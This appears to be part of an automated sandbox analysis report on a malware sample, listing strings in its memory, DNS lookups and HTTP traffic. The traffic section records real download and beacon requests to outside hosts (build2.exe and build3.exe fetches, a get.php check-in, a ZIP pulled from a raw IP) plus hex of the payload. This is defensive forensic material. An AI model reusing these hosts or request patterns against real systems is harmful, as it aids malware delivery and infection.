Source: U59WtZz2Sg.exe, 00000005.00000003.469204147.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.449920000.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450333989.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.468930777.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.447608292.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446128369.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471179889.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470164900.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.459195110.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458107166.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471657839.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.469951048.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446549026.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454318911.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470405278.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.467350799.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454777697.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460776709.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/AA23z1a
Source: U59WtZz2Sg.exe, 00000005.00000003.457247775.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/B
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308040774.000000000089A000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json5
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json=
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json=P
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsongP
Source: U59WtZz2Sg.exe, 00000001.00000003.306241286.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306100466.000000000089F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonk
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonl
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.545471776.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/about/en-us/0
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-5UcwRdS3
Source: U59WtZz2Sg.exe, 00000005.00000002.577338464.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385599244.0000000000908000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.577980822.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-5UcwRdS3ED
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/licenses/lgpl.html.
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: U59WtZz2Sg.exe, 00000005.00000003.420123871.0000000003060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=02Google
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/zGoogle
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: U59WtZz2Sg.exe, 00000005.00000003.546543404.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/B
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fresherlights.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: uaery.top
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: fresherlights.com
Source: global traffic	HTTP traffic detected: GET /517 HTTP/1.1Host: 88.198.94.71
Source: global traffic	HTTP traffic detected: GET /176356074953.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:22:31 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71

Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.527393147.0000000000610000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: U59WtZz2Sg.exe, 00000005.00000003.350334293.0000000003060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
